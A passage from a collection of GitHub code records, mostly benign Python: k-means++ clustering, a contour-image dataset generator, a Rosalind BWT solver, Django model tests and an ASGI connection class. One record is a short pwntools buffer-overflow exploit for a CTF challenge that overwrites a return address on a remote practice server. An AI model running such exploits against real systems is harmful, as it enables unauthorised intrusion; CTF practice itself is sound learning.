column_names1\n vectors2.columns = column_names2\n vectors = pd.merge(vectors1, vectors2, on=\"column1\", how=\"inner\")\n assert 1 < k < len(vectors), \"Invalid number of clusters!\"\n sorted_vectors = vectors.sort_values('column1', ascending=True)\n sorted_vectors = sorted_vectors.set_index('column1')\n sorted_vectors.index = sorted_vectors.index.astype(int)\n return k, max_iter, eps, sorted_vectors\n\n\ndef get_python_list(vectors: pd.DataFrame) -> list:\n return vectors.values.tolist()\n\n\ndef init_centroids(vectors: pd.DataFrame, k) -> pd.DataFrame:\n try:\n np.random.seed(0)\n rand_index = np.random.randint(0, len(vectors))\n centroids = pd.DataFrame(vectors.loc[rand_index]).T\n for i in range(k - 1):\n selected_centroid = select_vector(vectors.drop(centroids.index), centroids)\n centroids = pd.concat([centroids, selected_centroid.to_frame().T])\n except Exception as e:\n print(\"An Error Has Occurred\")\n sys.exit(1)\n return centroids\n\n\ndef select_vector(vectors: pd.DataFrame, centroids: pd.DataFrame):\n diff = vectors - centroids.values[np.argmin(np.linalg.norm(vectors.values[:, None] - centroids.values, axis=2), axis=1)]\n dist_to_closest = np.sqrt((diff ** 2).sum(axis=1))\n sum_of_dist = np.sum(dist_to_closest)\n weights = dist_to_closest / sum_of_dist if sum_of_dist != 0 else np.full(len(vectors), 1 / len(vectors))\n selected_vector = np.random.choice(vectors.index, p=weights)\n return vectors.loc[selected_vector]\n\n\ndef calc_dist_to_closest(vector: pd.Series, centroids: pd.DataFrame) -> float:\n diff = centroids - vector\n dists = np.sqrt((diff**2).sum(axis=1))\n return dists.min()\n\n\ndef euclidean_dist(vector1: pd.Series, vector2: pd.Series) -> float:\n return np.sqrt(np.sum((vector1 - vector2)**2))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"avishaysp/SW_Project_Course_HW2","sub_path":"kmeans_pp.py","file_name":"kmeans_pp.py","file_ext":"py","file_size_in_byte":4185,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"136372826","text":"#+++++++++++++++++++exp.py++++++++++++++++++++\n#!/usr/bin/python\n# -*- coding:utf-8 -*- \n#Author: Square_R\n#Time: 2021.02.01 15.40.55\n#+++++++++++++++++++exp.py++++++++++++++++++++\nfrom pwn import*\n\ncontext.arch = 'amd64'\n\n\nhost = '1.1.1.1'\nport = 10000\nlocal = 0\nif local:\n\tcontext.log_level = 'debug'\n\tlibc=ELF('/lib/x86_64-linux-gnu/libc.so.6')\n\telf = ELF('./SUCTF_2018_basic_pwn')\n\tsh = process('./SUCTF_2018_basic_pwn')\nelse:\n\t#context.log_level = 'debug'\n\t# libc=ELF('null')\n\telf = ELF('./SUCTF_2018_basic_pwn')\n\tsh = remote('node3.buuoj.cn',25057)\n\n\n\ndef pwn():\n\tpayload = 'A'*0x110 + p64(0xdeadbeef) + p64(0x0000000000401157)\n\tsh.sendline(payload)\n\n\nif __name__ == '__main__':\n\tpwn()\n\tsh.interactive()\n\n","repo_name":"squarepants0/BUU_PWN","sub_path":"suctf_2018_basic pwn/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"30202575543","text":"import numpy as np\nimport sys, os\n\nsys.path.append(os.path.abspath(os.path.join('..')))\n\nimport matplotlib.pyplot as plt\n\nfrom PIL import Image\nfrom PIL import ImageDraw\nimport scipy\nfrom scipy import ndimage\nimport time\nimport cv2\ncv2.useOptimized()\n\nimport snakes\n\n\n# Accumulate metadata\ndef accumulate_meta(array, subpath, filename, args, nimg, paddle_margin = None):\n # NEW VERSION\n array += [[subpath, filename, nimg, args.LABEL,\n args.continuity, args.contour_length, args.distractor_length,\n args.paddle_length, args.paddle_thickness, paddle_margin, len(args.paddle_contrast_list)]]\n return array\n # GENERATED ARRAY IS NATURALLY SORTED BY THE ORDER IN WHICH IMGS ARE CREATED.\n # IN TRAIN OR TEST TIME CALL np.random.shuffle(ARRAY)\n\n\ndef two_snakes(image_size, padding, seed_distance,\n num_segments, segment_length, thickness, margin, continuity, small_dilation_structs, large_dilation_structs,\n contrast_list,\n max_segment_trial, aa_scale,\n display_snake = False, display_segment = False,\n allow_shorter_snakes=False, stop_with_availability=None):\n\n # draw initial segment\n for isegment in range(1):\n num_possible_contrasts = len(contrast_list)\n if num_possible_contrasts>0:\n contrast_index = np.random.randint(low=0, high=num_possible_contrasts)\n else:\n contrast_index = 0\n contrast = contrast_list[contrast_index]\n current_image, current_mask, current_segment_masks, current_pivots, current_orientations, origin_tips, success \\\n = initialize_two_seeds(image_size, padding, seed_distance,\n segment_length, thickness, margin, contrast,\n small_dilation_structs, large_dilation_structs,\n max_segment_trial,\n aa_scale, display=display_segment)\n if success is False:\n return np.zeros((image_size[0], image_size[1])), np.zeros((image_size[0], image_size[1])), None, None, False\n\n # sequentially add segments\n terminal_tips = [[0,0],[0,0]]\n for isegment in range(num_segments-1):\n if num_possible_contrasts>0:\n contrast_index = np.random.randint(low=0, high=num_possible_contrasts)\n else:\n contrast_index = 0\n contrast = contrast_list[contrast_index]\n for isnake in range(len(current_segment_masks)):\n current_image, current_mask, current_segment_masks[isnake], current_pivots[isnake], current_orientations[isnake], terminal_tips[isnake], success \\\n = snakes.extend_snake(list(current_pivots[isnake]), current_orientations[isnake], current_segment_masks[isnake],\n current_image, current_mask, max_segment_trial,\n segment_length, thickness, margin, continuity, contrast,\n small_dilation_structs, large_dilation_structs,\n aa_scale = aa_scale,\n display=display_segment,\n forced_current_pivot=None)\n if success is False:\n if allow_shorter_snakes:\n return current_image, current_mask, None, None, True\n else:\n return current_image, current_mask, None, None, False\n current_mask = np.maximum(current_mask, current_segment_masks[-1])\n # display snake\n if display_snake:\n plt.figure(figsize=(10, 10))\n plt.subplot(1, 2, 1)\n plt.imshow(current_image)\n plt.subplot(1, 2, 2)\n plt.imshow(current_mask)\n plt.show()\n return current_image, current_mask, origin_tips, terminal_tips, True\n\n\ndef initialize_two_seeds(image_size, padding, seed_distance,\n length, thickness, margin, contrast,\n small_dilation_structs, large_dilation_structs,\n max_segment_trial,\n aa_scale, display=False):\n\n image = np.zeros((image_size[0], image_size[1]))\n mask = np.zeros((image_size[0], image_size[1]))\n mask[:padding, :] = 1\n mask[-padding:, :] = 1\n mask[:, :padding] = 1\n mask[:, -padding:] = 1\n\n struct_shape = ((length+margin)*2+1, (length+margin)*2+1)\n struct_head = [length+margin+1, length+margin+1]\n\n ######################## SAMPLE FIRST SEGMENT\n trial_count = 0\n while trial_count <= max_segment_trial:\n sampled_orientation_in_rad1 = np.random.randint(low=-180, high=180) * np.pi / 180\n if sampled_orientation_in_rad1+np.pi < np.pi:\n sampled_orientation_in_rad_reversed = sampled_orientation_in_rad1 + np.pi\n else:\n sampled_orientation_in_rad_reversed = sampled_orientation_in_rad1 - np.pi\n\n # generate dilation struct\n _, struct = snakes.draw_line_n_mask(struct_shape, struct_head, sampled_orientation_in_rad1, length, thickness, margin, large_dilation_structs, aa_scale)\n # head-centric struct\n\n # dilate mask using segment\n lined_mask = mask.copy()\n lined_mask[:seed_distance*2,:] = 1\n lined_mask[image_size[0]-seed_distance*2:,:] = 1\n lined_mask[:,:seed_distance*2] = 1\n lined_mask[:,image_size[1]-seed_distance*2:] = 1\n dilated_mask = snakes.binary_dilate_custom(lined_mask, struct, value_scale=1.)\n # dilation in the same orientation as the tail\n\n # run coordinate searcher while also further dilating\n _, raw_num_available_coordinates = snakes.find_available_coordinates(np.ceil(mask-0.3), margin=0)\n available_coordinates, num_available_coordinates = snakes.find_available_coordinates(np.ceil(dilated_mask-0.3), margin=0)\n if num_available_coordinates == 0:\n #print('Mask fully occupied after dilation. finalizing')\n return image, mask, [np.zeros_like(mask),np.zeros_like(mask)], [None, None], [None, None], [None, None], False\n continue\n\n # sample coordinate and draw\n random_number = np.random.randint(low=0,high=num_available_coordinates)\n sampled_tail1 = [available_coordinates[0][random_number],available_coordinates[1][random_number]] # CHECK OUT OF BOUNDARY CASES\n sampled_head1 = snakes.translate_coord(sampled_tail1, sampled_orientation_in_rad1, length)\n sampled_pivot1 = snakes.translate_coord(sampled_head1, sampled_orientation_in_rad_reversed, length+margin)\n sampled_tip1 = [sampled_tail1[0], sampled_tail1[1]]\n if (sampled_head1[0] < 0) | (sampled_head1[0] >= mask.shape[0]) | \\\n (sampled_head1[1] < 0) | (sampled_head1[1] >= mask.shape[1]) | \\\n (sampled_pivot1[0] < 0) | (sampled_pivot1[0] >= mask.shape[0]) | \\\n (sampled_pivot1[1] < 0) | (sampled_pivot1[1] >= mask.shape[1]):\n #print('missampled seed +segment_trial_count')\n trial_count += 1\n continue\n else:\n break\n if trial_count > max_segment_trial:\n return image, mask, [np.zeros_like(mask),np.zeros_like(mask)], [None, None], [None, None], [None, None], False\n l_im, m_im1 = snakes.draw_line_n_mask((mask.shape[0], mask.shape[1]), sampled_tail1, sampled_orientation_in_rad1, length, thickness, margin, large_dilation_structs, aa_scale, contrast_scale=contrast)\n image = np.maximum(image, l_im)\n\n\n ######################## SAMPLE SECOND SEGMENT\n trial_count = 0\n while trial_count <= max_segment_trial:\n sampled_orientation_in_rad2 = np.random.randint(low=-180, high=180) * np.pi / 180\n if sampled_orientation_in_rad2 + np.pi < np.pi:\n sampled_orientation_in_rad_reversed = sampled_orientation_in_rad2 + np.pi\n else:\n sampled_orientation_in_rad_reversed = sampled_orientation_in_rad2 - np.pi\n\n sample_in_rad = np.random.randint(0, 360) * np.pi / 180\n # get lists of y and x coordinates (exclude out-of-bound coordinates)\n sample_in_y = int(np.round_(sampled_tail1[0] + (seed_distance * np.sin(sample_in_rad))))\n sample_in_x = int(np.round_(sampled_tail1[1] + (seed_distance * np.cos(sample_in_rad))))\n sampled_tail2 = [sample_in_y, sample_in_x]\n sampled_head2 = snakes.translate_coord(sampled_tail2, sampled_orientation_in_rad2, length)\n sampled_pivot2 = snakes.translate_coord(sampled_head2, sampled_orientation_in_rad_reversed, length + margin)\n sampled_tip2 = [sampled_tail2[0], sampled_tail2[1]]\n if (sampled_head2[0] < 0) | (sampled_head2[0] >= mask.shape[0]) | \\\n (sampled_head2[1] < 0) | (sampled_head2[1] >= mask.shape[1]) | \\\n (sampled_pivot2[0] < 0) | (sampled_pivot2[0] >= mask.shape[0]) | \\\n (sampled_pivot2[1] < 0) | (sampled_pivot2[1] >= mask.shape[1]):\n #print('missampled seed +segment_trial_count')\n trial_count += 1\n continue\n else:\n break\n if trial_count > max_segment_trial:\n return image, mask, [np.zeros_like(mask),np.zeros_like(mask)], [None, None], [None, None], [None, None], False\n\n l_im, m_im2 = snakes.draw_line_n_mask((mask.shape[0], mask.shape[1]), sampled_tail2, sampled_orientation_in_rad2, length,\n thickness, margin, large_dilation_structs, aa_scale, contrast_scale=contrast)\n image = np.maximum(image, l_im)\n\n if display:\n plt.figure(figsize=(10,20))\n plt.imshow(image)\n plt.title(str(num_available_coordinates))\n plt.plot(sampled_tail1[1], sampled_tail1[0], 'bo')\n plt.plot(sampled_head1[1], sampled_head1[0], 'ro')\n plt.plot(sampled_tail2[1], sampled_tail2[0], 'bo')\n plt.plot(sampled_head2[1], sampled_head2[0], 'ro')\n plt.show()\n\n return image, mask, [m_im1,m_im2], [sampled_pivot1, sampled_pivot2], [sampled_orientation_in_rad1, sampled_orientation_in_rad2], [sampled_tip1, sampled_tip2], True\n\n\ndef draw_circle(window_size, coordinate, radius, aa_scale):\n image = np.zeros((window_size[0]*aa_scale, window_size[1]*aa_scale))\n y, x = np.ogrid[-coordinate[0]*aa_scale:(window_size[0]-coordinate[0])*aa_scale,\n -coordinate[1]*aa_scale:(window_size[1]-coordinate[1])*aa_scale]\n mask = x ** 2 + y ** 2 <= (radius*aa_scale) ** 2\n image[mask] = 1\n return scipy.misc.imresize(image, (window_size[0], window_size[1]), interp='lanczos')\n\ndef test():\n t = time.time()\n\n imsize = 300\n padding = 22\n aa_scale = 4\n\n LABEL = 1\n\n snake_length = 18 # from 5 to 21, with steps of 4\n distractor_length = snake_length/3\n continuity = 2.5 # from 3.0 ~ 1.0 with steps of -0.5\n base_num_paddles = 150\n\n segment_length = 5\n marker_radius = 3\n thickness = 1.5\n margin = 4\n seed_distance = 3*(segment_length+margin)\n\n contrast_list = [1.0]\n max_distractor_snake_retrial = 3\n max_segment_trial = 2\n num_paddles_factor = 1. / ((7.5 + 13 * margin + 4 * margin * margin) / 123.5)\n total_num_paddles = int(base_num_paddles * num_paddles_factor)\n\n ### SAMPLE TWO TARGET SNAKES\n small_dilation_structs = snakes.generate_dilation_struct(margin)\n large_dilation_structs = snakes.generate_dilation_struct(margin*aa_scale)\n success = False\n while not success:\n image, mask, origin_tips, terminal_tips, success = \\\n two_snakes([imsize, imsize], padding, seed_distance,\n snake_length, segment_length, thickness, margin, continuity,\n small_dilation_structs, large_dilation_structs,\n contrast_list,\n max_segment_trial, aa_scale,\n display_snake=False, display_segment=False,\n allow_shorter_snakes=False, stop_with_availability=None)\n\n ### SAMPLE SHORT SNAKE DISTRACTORS\n num_distractor_snakes = 40/distractor_length\n image, mask = snakes.make_many_snakes(image, mask,\n num_distractor_snakes, max_distractor_snake_retrial,\n distractor_length, segment_length, thickness, margin, continuity, contrast_list,\n max_segment_trial, aa_scale,\n display_final=False, display_snake=False, display_segment=False,\n allow_incomplete=True, allow_shorter_snakes=False, stop_with_availability=0.01)\n\n\n ### SAMPLE SINGLE PADDLE DISTRACTORS\n num_single_paddles = total_num_paddles - 2*snake_length - num_distractor_snakes*distractor_length\n image, _ = snakes.make_many_snakes(image, mask,\n num_single_paddles, max_segment_trial,\n 1, segment_length, thickness, margin, continuity, contrast_list,\n max_segment_trial, aa_scale,\n display_final=False, display_snake=False, display_segment=False,\n allow_incomplete=True, allow_shorter_snakes=False, stop_with_availability=0.01)\n\n ### ADD MARKERS\n if LABEL == 0:\n origin_mark_idx = np.random.randint(0,2)\n terminal_mark_idx = 1-origin_mark_idx\n else:\n origin_mark_idx = np.random.randint(0,2)\n terminal_mark_idx = origin_mark_idx\n origin_mark_coord = origin_tips[origin_mark_idx]\n terminal_mark_coord = terminal_tips[terminal_mark_idx]\n markers = np.maximum(draw_circle([imsize,imsize], origin_mark_coord, marker_radius, aa_scale),\n draw_circle([imsize,imsize], terminal_mark_coord, marker_radius, aa_scale)).astype(np.float)/255\n image_marked = np.maximum(image, markers)\n\n elapsed = time.time() - t\n\n plt.figure(figsize=(10, 10))\n show2 = scipy.misc.imresize(image_marked, (imsize, imsize), interp='lanczos')\n plt.imshow(show2)\n plt.colorbar()\n plt.axis('off')\n plt.show()\n\n print('ELAPSED TIME : ', str(elapsed))\n\n\n\ndef from_wrapper(args):\n\n t = time.time()\n iimg = 0\n\n if (args.save_images):\n contour_sub_path = os.path.join('imgs', str(args.batch_id))\n if not os.path.exists(os.path.join(args.contour_path, contour_sub_path)):\n os.makedirs(os.path.join(args.contour_path, contour_sub_path))\n if args.save_metadata:\n metadata = []\n # CHECK IF METADATA FILE ALREADY EXISTS\n metadata_path = os.path.join(args.contour_path, 'metadata')\n if not os.path.exists(metadata_path):\n os.makedirs(metadata_path)\n metadata_fn = str(args.batch_id) + '.npy'\n metadata_full = os.path.join(metadata_path, metadata_fn)\n if os.path.exists(metadata_full):\n print('Metadata file already exists.')\n return\n\n while (iimg < args.n_images):\n print('Image# : %s'%(iimg))\n\n # Sample paddle margin\n num_possible_margins = len(args.paddle_margin_list)\n if num_possible_margins > 0:\n margin_index = np.random.randint(low=0, high=num_possible_margins)\n else:\n margin_index = 0\n\n margin = args.paddle_margin_list[margin_index]\n base_num_paddles = 150\n num_paddles_factor = 1. / ((7.5 + 13 * margin + 4 * margin * margin) / 123.5)\n total_num_paddles = int(base_num_paddles * num_paddles_factor)\n\n small_dilation_structs = snakes.generate_dilation_struct(margin)\n large_dilation_structs = snakes.generate_dilation_struct(margin * args.antialias_scale)\n\n ### SAMPLE TWO TARGET SNAKES\n success = False\n while not success:\n image, mask, origin_tips, terminal_tips, success = \\\n two_snakes(args.window_size, args.padding, args.seed_distance,\n args.contour_length, args.paddle_length, args.paddle_thickness, margin, args.continuity,\n small_dilation_structs, large_dilation_structs,\n args.paddle_contrast_list,\n args.max_paddle_retrial,\n args.antialias_scale,\n display_snake=False, display_segment=False,\n allow_shorter_snakes=False, stop_with_availability=None)\n\n ### SAMPLE SHORT SNAKE DISTRACTORS\n num_distractor_snakes = 30 / args.distractor_length\n image, mask = snakes.make_many_snakes(image, mask,\n num_distractor_snakes, args.max_distractor_contour_retrial,\n args.distractor_length, args.paddle_length, args.paddle_thickness, margin, args.continuity,\n args.paddle_contrast_list,\n args.max_paddle_retrial,\n args.antialias_scale,\n display_final=False, display_snake=False, display_segment=False,\n allow_incomplete=True, allow_shorter_snakes=False,\n stop_with_availability=0.01)\n\n if (image is None):\n continue\n if args.use_single_paddles is not False:\n ### SAMPLE SINGLE PADDLE DISTRACTORS\n num_single_paddles = total_num_paddles - 2 * args.contour_length - num_distractor_snakes * args.distractor_length\n image, _ = snakes.make_many_snakes(image, mask,\n num_single_paddles, args.max_paddle_retrial,\n 1, args.paddle_length, args.paddle_thickness, margin, args.continuity,\n args.paddle_contrast_list,\n args.max_paddle_retrial,\n args.antialias_scale,\n display_final=False, display_snake=False, display_segment=False,\n allow_incomplete=True, allow_shorter_snakes=False,\n stop_with_availability=0.01)\n if (image is None):\n continue\n\n ### ADD MARKERS\n if args.LABEL == 0:\n origin_mark_idx = np.random.randint(0, 2)\n terminal_mark_idx = 1 - origin_mark_idx\n else:\n origin_mark_idx = np.random.randint(0, 2)\n terminal_mark_idx = origin_mark_idx\n origin_mark_coord = origin_tips[origin_mark_idx]\n terminal_mark_coord = terminal_tips[terminal_mark_idx]\n markers = np.maximum(draw_circle(args.window_size, origin_mark_coord, args.marker_radius, args.antialias_scale),\n draw_circle(args.window_size, terminal_mark_coord, args.marker_radius, args.antialias_scale)).astype(np.float) / 255\n image_marked = np.maximum(image, markers)\n\n if (args.pause_display):\n plt.figure(figsize=(10, 10))\n show2 = scipy.misc.imresize(image_marked, (args.window_size[0], args.window_size[1]), interp='lanczos')\n plt.imshow(show2)\n plt.colorbar()\n plt.axis('off')\n plt.show()\n if (args.save_images):\n fn = \"sample_%s.png\"%(iimg)\n scipy.misc.imsave(os.path.join(args.contour_path, contour_sub_path, fn), image_marked)\n if (args.save_metadata):\n metadata = accumulate_meta(metadata, contour_sub_path, fn, args, iimg, paddle_margin=margin)\n ## TODO: GT IS NOT INCLUDED IN METADATA\n iimg += 1\n\n if (args.save_metadata):\n matadata_nparray = np.array(metadata)\n snakes.save_metadata(matadata_nparray, args.contour_path, args.batch_id)\n elapsed = time.time() - t\n print('ELAPSED TIME : ', str(elapsed))\n\n plt.show()\n\n return\n\nif __name__ == \"__main__\":\n test()\n\n # ALGORITHM\n # 1. compute initial point\n # current_start = translate(last_endpoint, last_orientation, dilation+1)\n # 2. draw current_endpoint (distance = line_length + dilation)\n # compute current_orientation\n # M' <--- dilate(M, dilation+2)\n # sample endpoint using M'\n # trial_count += 1\n # 3. compute line and mask\n # l_current, m_current = draw_line_n_mask(translate(current_start, current_orientation, dilation), current_endpoint, dilation)\n # 4. check if max(M + m_current) > 2\n # yes -> check if retrial_count > max_count\n # yes -> return with failure flag\n # no -> goto 2\n # no -> goto 5\n # 5. draw image I += l_current\n # 6. draw mask M = max(M, m_last)\n # 7. m_last = m_current.copy()\n # 8. retrial_count = 0\n","repo_name":"vijayvee/gilbert_contours","sub_path":"snakes2.py","file_name":"snakes2.py","file_ext":"py","file_size_in_byte":20831,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37009472509","text":"lList = list()\nfList = list()\n\nfDict = {\n \"$\": 0,\n \"A\": 0,\n \"C\": 0,\n \"T\": 0,\n \"G\": 0\n}\n\nchMapping = {\n \"$\": 1,\n \"A\": 2,\n \"C\": 3,\n \"G\": 4,\n \"T\": 5\n}\n\ndef getFirstColumn(lColumn):\n return \"\".join(sorted(lColumn))\n\ndef generateLFMapper(lColumn):\n tup = ('',0,0, 0, 0, 0)\n lList.append(tup)\n for i in range(1,len(lColumn)+1):\n temp = list()\n num = chMapping.get(lColumn[i-1])\n lasttup = lList[i-1]\n temp.append(lColumn[i-1])\n for j in range(1,6):\n if j == num:\n temp.append(lasttup[j] + 1)\n else:\n temp.append(lasttup[j])\n lList.append(tuple(temp))\n lList.pop(0)\n\ndef BWMATCHING(lastColumn, pattern):\n top = 0\n bottom = len(lastColumn)-1\n while top <= bottom:\n if pattern != \"\":\n symbol = pattern[-1]\n pattern = pattern[0:len(pattern)-1]\n\n first = lList[top]\n last = lList[bottom]\n start = first[chMapping.get(symbol)]\n end = last[chMapping.get(symbol)]\n\n if lastColumn[top] == symbol:\n start -= 1\n\n times = end - start\n if times >= 1:\n top = fList[chMapping.get(symbol)-1] + start\n bottom = fList[chMapping.get(symbol)-1] + end - 1\n else:\n return 0\n else:\n return bottom-top+1\n\ndef readFile(path):\n file = open(path, \"r\")\n count = 0\n dnaSequence = \"\"\n lis = list()\n for line in (file):\n if line.strip().__contains__(\" \") == False:\n dnaSequence += line.strip()\n else:\n lis.extend(line.strip().split(\" \"))\n\n file.close()\n return dnaSequence,lis\n\ndef constructFirstOccurence(firstColumn):\n for i in range(len(firstColumn)):\n if fDict.get(firstColumn[i]) == 0:\n fDict[firstColumn[i]] = 1\n fList.append(i)\n\ntupl = readFile(\"/Users/jatingarg/Downloads/rosalind_ba9m.txt\")\nlC = tupl[0]\nfC = getFirstColumn(lC)\nconstructFirstOccurence(fC)\ngenerateLFMapper(lC)\nans = list()\nfor element in tupl[1]:\n pattern = element\n a = str(BWMATCHING(lC,pattern))\n ans.append(a)\nprint(\" \".join(ans))","repo_name":"jgarg-stonybrook/Fall-2017","sub_path":"Computational Biology/CompBioRosalindAssignments/BestBWTMatching.py","file_name":"BestBWTMatching.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74127986328","text":"import datetime\nimport unittest\n\nfrom django.http import Http404\n\nfrom . import AppEngineTestCase\nfrom pasty.models import LexerConfig, Paste, PastyFile, make_relative_path\n\n\nclass PasteTestCase(AppEngineTestCase):\n def test_unicode(self):\n obj = Paste(author='alice@example.com', filename='example.txt')\n\n self.assertEqual(unicode(obj), u'alice@example.com / example.txt')\n\n def test_unicode_for_anonymous_author(self):\n obj = Paste(filename='example.txt')\n\n self.assertEqual(unicode(obj), u'anonymous / example.txt')\n\n def test_get_or_404_with_none_id(self):\n with self.assertRaises(Http404):\n Paste.get_or_404(None)\n\n def test_get_or_404_with_bad_id(self):\n with self.assertRaises(Http404):\n Paste.get_or_404('bogus')\n\n def test_get_or_404_with_unknown_id(self):\n self.assertIsNone(Paste.get_by_id(1234))\n\n with self.assertRaises(Http404):\n Paste.get_or_404(1234)\n\n def test_get_or_404_returns_paste_for_valid_integer_id(self):\n Paste(id=1234).put()\n\n obj = Paste.get_or_404(1234)\n\n self.assertEqual(obj.key.id(), 1234)\n\n def test_get_or_404_returns_paste_for_valid_string_id(self):\n Paste(id=1234).put()\n\n obj = Paste.get_or_404('1234')\n\n self.assertEqual(obj.key.id(), 1234)\n\n def test_to_dict_for_forked_paste(self):\n xmas = datetime.datetime(2016, 12, 25)\n orig_key = Paste(id=1234, created=xmas).put()\n fork = Paste(id=5678, created=xmas, fork=orig_key)\n fork.put()\n\n result = fork.to_dict()\n\n self.assertEqual(\n result,\n {\n u'author': None,\n u'created': xmas,\n u'description': None,\n u'filename': 'untitled.txt',\n u'files': [],\n u'fork': 1234,\n u'id': 5678,\n u'num_files': 0,\n u'num_lines': 0,\n u'preview': None,\n u'url': u'/5678/',\n },\n )\n\n def test_highlight_content_with_custom_lexer_config(self):\n config = LexerConfig.get()\n config.lexers = [{'extension': 'sass', 'language': 'CSS'}]\n config.put()\n\n # Same content, but different filenames.\n files = [\n ('example.sass', 'body { font-family: serif; }'),\n ('example.txt', 'body { font-family: serif; }'),\n ]\n paste = Paste.create_with_files(files=files)\n\n css_expected = (\n u'<div class=\"highlight highlight__autumn\"><pre><span></span>'\n u'<span class=\"nt\">body</span> <span class=\"p\">{</span>'\n u' <span class=\"nb\">font-family</span><span class=\"o\">:</span>'\n u' <span class=\"nb\">serif</span><span class=\"p\">;</span>'\n u' <span class=\"p\">}</span>\\n</pre></div>\\n'\n )\n txt_expected = (\n u'<div class=\"highlight highlight__autumn\"><pre><span></span>'\n u'body { font-family: serif; }\\n</pre></div>\\n'\n )\n\n self.assertEqual(paste.preview, css_expected)\n # The sass file was highlighted as CSS.\n self.assertEqual(paste.files[0].content_highlight(), css_expected)\n self.assertEqual(paste.files[1].content_highlight(), txt_expected)\n\n\nclass PastyFileTestCase(AppEngineTestCase):\n def test_default_content_type(self):\n obj = PastyFile()\n\n self.assertEqual(obj.content_type, 'text/plain')\n\n def test_known_content_type(self):\n obj = PastyFile(filename='example.jpg')\n\n self.assertEqual(obj.content_type, 'image/jpeg')\n\n\nclass LexerConfigTestCase(AppEngineTestCase):\n def test_get_singleton(self):\n config = LexerConfig.get()\n\n self.assertEqual(config.lexers, [])\n self.assertEqual(config.key.id(), 'config')\n\n def test_adding_config(self):\n config = LexerConfig.get()\n\n m = LexerConfig.mapping(extension='foo', language='FooLang')\n config.lexers.append(m)\n config.put()\n\n config = LexerConfig.get()\n self.assertEqual(config.lexers, [m])\n\n\nclass MakeRelativePathTestCase(unittest.TestCase):\n def test_valid_file_path(self):\n result = make_relative_path('pasty/1999/1/1/123/1/foo.html')\n\n self.assertEqual(result, '1/foo.html')\n\n def test_invalid_file_path_error(self):\n with self.assertRaisesRegexp(ValueError, 'Invalid file path'):\n make_relative_path('pasty/1999/1/1/abc/1/foo.html')\n","repo_name":"davidwtbuxton/captain-pasty","sub_path":"pasty/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":4489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39667235636","text":"from enum import Enum\nfrom http import HTTPStatus\nfrom http.cookies import SimpleCookie\nfrom operator import itemgetter\nfrom typing import List, Optional, Union, ByteString\nfrom urllib.parse import parse_qsl\n\nfrom multidict import CIMultiDict\n\nfrom .exception import HTTPRequestError, HTTPStateError, PythonPlugRuntimeError\nfrom .typing import CoroutineFunction\n\n\nclass ConnType(Enum):\n ws = \"websocket\"\n http = \"http\"\n\n\nclass Conn: # pylint: disable=too-many-instance-attributes\n\n ASGI2 = \"ASGI2\"\n ASGI3 = \"ASGI3\"\n\n def __init__(\n self,\n *,\n scope: dict,\n receive: Optional[CoroutineFunction] = None,\n send: Optional[CoroutineFunction] = None,\n ) -> None:\n\n self._receive = receive\n self._send = send\n\n # request fields\n self._scope = scope\n self._req_headers: Optional[CIMultiDict] = None\n self._req_cookies: SimpleCookie = SimpleCookie()\n self.http_body = b\"\"\n self.http_has_more_body = True\n self.http_received_body_length = 0\n\n # response fields\n self.resp_charset: str = \"utf-8\"\n self.resp_cookies: SimpleCookie = SimpleCookie()\n self.resp_headers: CIMultiDict = CIMultiDict()\n self.status: Union[int, HTTPStatus] = 0\n\n # conn fields\n self.halted: bool = False\n self.started: bool = False\n\n # private fields\n self.private: dict = {}\n\n # hooks\n self._after_start: List[CoroutineFunction] = []\n self._before_send: List[CoroutineFunction] = []\n self._after_send: List[CoroutineFunction] = []\n\n # meta\n self.interface = Conn.ASGI2 # ASGI2, ASGI3\n\n @property\n def req_headers(self) -> CIMultiDict:\n if not self._req_headers:\n self._req_headers = CIMultiDict(\n [\n (k.decode(\"ascii\"), v.decode(\"ascii\"))\n for (k, v) in self._scope[\"headers\"]\n ]\n )\n return self._req_headers\n\n @property\n def req_cookies(self) -> SimpleCookie:\n if not self._req_headers:\n self._req_cookies.load(self.req_headers.get(\"cookie\", {}))\n return self._req_cookies\n\n @property\n def req_cookies_dict(self):\n return {key: m.value for key, m in self.req_cookies.items()}\n\n @property\n def scope(self):\n return self._scope\n\n @property\n def type(self) -> ConnType:\n return ConnType.ws if self.scope.get(\"type\") == \"websocket\" else ConnType.http\n\n @property\n def query_params(self):\n return CIMultiDict(\n parse_qsl(self.scope.get(\"query_string\", b\"\").decode(\"utf-8\"))\n )\n\n async def send(self, message, *args, **kwargs):\n if not self._send:\n raise HTTPStateError(\"Conn is not plugged.\")\n await self._send(message, *args, **kwargs)\n if not self.started and message.get(\"type\") == \"http.response.start\":\n self.started = True\n for callback in self._after_start:\n await callback(self)\n if (\n not self.halted\n and message.get(\"type\") == \"http.response.body\"\n and message.get(\"more_body\", False) is False\n ):\n self.halted = True\n for callback in self._after_send:\n await callback(self)\n return self\n\n async def receive(self):\n if not self._receive:\n raise HTTPStateError(\"Conn is not plugged.\")\n return await self._receive()\n\n async def body_iter(self):\n if not self.type == ConnType.http:\n raise HTTPRequestError(\"Conn.type is not HTTP\")\n if self.http_received_body_length > 0 and self.http_has_more_body:\n raise HTTPStateError(\"body iter is already started and is not finished\")\n if self.http_received_body_length > 0 and not self.http_has_more_body:\n yield self.http_body\n req_body_length = (\n int(self.req_headers.get(\"content-length\", \"0\"))\n if not self.req_headers.get(\"transfer-encoding\") == \"chunked\"\n else None\n )\n while self.http_has_more_body:\n if req_body_length and self.http_received_body_length > req_body_length:\n raise HTTPRequestError(\"body is longer than declared\")\n message = await self.receive()\n message_type = message.get(\"type\")\n await self.handle_message(message)\n if message_type != \"http.request\":\n continue\n chunk = message.get(\"body\", b\"\")\n if not isinstance(chunk, bytes):\n raise PythonPlugRuntimeError(\"Chunk is not bytes\")\n self.http_body += chunk\n self.http_has_more_body 